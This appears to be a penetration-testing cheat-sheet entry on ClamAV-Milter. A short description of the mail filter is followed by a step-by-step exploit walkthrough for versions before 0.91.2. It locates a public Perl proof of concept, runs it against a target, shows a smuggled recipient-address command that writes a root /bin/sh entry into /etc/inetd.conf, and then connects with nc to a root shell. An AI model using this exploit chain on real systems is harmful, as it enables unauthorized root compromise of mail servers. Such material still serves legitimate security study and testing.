ClamAV

ClamAV-Milter is a mail filtering daemon that connects ClamAV, an open-source antivirus engine, with a mail transfer agent (MTA) such as Sendmail. Its role is to scan email content as it flows through the MTA, using the Milter protocol to hook into the mail processing pipeline. This protocol allows the milter to examine or modify messages during delivery without directly handling SMTP traffic. ClamAV-Milter does not open any network ports of its own by default; instead, it communicates with the MTA over a local Unix socket, such as /var/run/clamav/clamav-milter.ctl.

< 0.91.2

# Identify the PoC
$ searchsploit clamav-milter
​
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
​
# Execute the PoC
$ perl 4761.pl <target>
<SNIP>
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
<SNIP>
​
# Connect to the listening socket
$ nc <target> 31337      
id
uid=0(root) gid=0(root) groups=0(root)